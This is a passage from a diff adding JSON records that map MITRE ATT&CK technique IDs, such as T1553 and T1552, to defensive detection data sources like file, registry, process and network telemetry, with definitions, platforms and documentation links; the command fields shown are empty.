"network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1554", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1036.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1036.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1553.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1553.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1553", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1027.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1552", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + 